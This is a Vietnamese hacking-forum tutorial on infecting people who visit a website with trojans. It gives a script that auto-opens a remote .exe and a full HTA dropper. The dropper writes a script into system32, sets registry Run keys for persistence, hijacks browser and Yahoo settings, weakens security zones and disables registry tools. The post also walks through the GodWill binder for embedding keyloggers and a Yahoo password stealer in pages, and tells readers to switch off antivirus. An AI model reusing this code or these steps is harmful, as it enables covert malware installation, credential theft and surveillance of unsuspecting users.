Tấn công máy chủ phòng net từ xa
Link: http://binhzo1.hnsv.com/viewtopic.php?f=32&t=130Khi các bạn đã sử dụng thành công nhưng do 1 phút sơ sảy mà bị Công An bắt thì chỉ mong các anh đừng réo và khai tên em ra kẻo tội nghiệpCách 1 : dùng một đoạn mã đơn giản để open 1 con trojan !
đoạn mã như sau:
<script language=javascript>
open("http://freewebs.com/nhutuanweb/thanks.exe");
</SCRIPT>
với đoạn mã này bạn gắn dưới thẻ body thì mỗi khi truy cập website nó sẽ tự open con trojan của bạn.
cách thứ 2 là cách rất cao cấp ...
bạn copy vào notepad đoạn mã sau:
<html>
<head>
<script language="javascript">
try {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var Shell = new ActiveXObject("WScript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var burl = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\RunOnce\\\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Run\\\\System32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url2","http://http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url3","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url4","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url5","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url6","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url7","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url8","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url9","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url10","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url11","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Calendar\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Games\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Launchcast\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Weather\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Policies\\\\System\\\\DisableRegistryT ools",1,"REG_DWORD");');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>
<!--- <frameset></frameset> -->
rồi save lại với tên là : hackervn.hta
nhớ là thay đường dẫn của con trojan đi nha..(http://www.freewebs.com/hinhanhlop18/hackervn.exe) là đường dăn tơi kon TJ
sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
<center>
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="hackervn.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>
rồi sau đó bạn upload file hackervn.hta + với website của bạn lên cùng 1 host ...ok mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện+ thêm nó set homepage luôn cho chắc ăn...
cách này rất hay...và cao cấp.
cách thứ 3
là các bạn dùng chương trình gắn trojan vào html: đó là GodWill1.06
chương trình này mình thấy nói rất nhiều trên các diễn đàn nhưng mà chẳng có ai làm được cả...hình như là copy ở site ra thôi.
các bạn downlaod tại đây http://www.freewebs.com/trangchulop18/GodWill1.6.rar (http://www.esnips.com/doc/ffe5986f-729e-4699-a5e4-bd4efc19b7b4/GodWill1.6)...nếu không down được thì các bạn lên google tìm nha.file kimdung upload lên gồm cả file hỗ trợ nữa nên nó khoảng 1.3Mb. nào bạn hãy tắt các trương trình diệt virus đi dể chúng ta setup
sau khi down về giải nén sẽ có các file sau như hình sau:
nhấn kép vào file GODWILL sẽ có hình sau:
sau khi bạn đọc xong những điều khoản thì nhấn enter.
rồi đến đây bắt đầu xuất hiện những tiện ích của con trojan này.
cái chúng ta quan tâm ở đây là html ! ok nhấn vào chữ HTML:
đến đây các bạn nhấn: Genral Options để chúng ta bắt đầu tạo.
vì đặc điểm của con này là nó chỉ cho gắn một con trojan khoảng 34Kb thôi nên chúng ta tìm những con trojan nào dưới 34Kb như con MYSPY hay con K2PS hay con hackpass mới nhất đó yjaked1
+ ở mục enter .exe fie bạn mở con trojan đã chuẩn bị trước ra (MYSPY hay con K2PS,yjaked1...)
chọn đường dẫn tới nó.
+ ở mục enter.html bạn chọn đường dẫn cho trang web mình cần gắn trojan.
+ không nhắp chọn Uer defult page
+ ở mục enter.output bạn đổi tên file Geebferh.html thành tên nào bạn muốn.vì sau khi tạo xong thì trang web có gắn trojan sẽ là tên đó ( bạn không được mở trang đó ra)
+ page ICQ notyfi bạn muốn nhấp chọn cũng được nếu bạn có số ICQ thì nhấn chọn để mỗi khi có người open trang web nó sẽ báo về ICQ cho bạn...như kimdung thì chọn hết ngoại trừ "Uer defult page"
rồi xong sau khi đã hoàn thành các bước giờ thì bạn nhấn DOVE được rồi.
rồi nhấn GEN để hoàn thành ...Godwill sẽ gắn con trojan của bạn vào trang web của bạn
và nó sẽ tự hoạt động mỗi khi có người mở trang web đó ra.
trojan k2sp là keylogger.
MYSPY là một loại gián điệp
yjaked1 dùng để hack pass yahoo.
(http://www.esnips.com/doc/52836e78-0942-4272-9344-65da70ac2a26/yjaked1)
Chúc thành công và đừng nhớ đến tui khi bị bắt
nguon :truongton
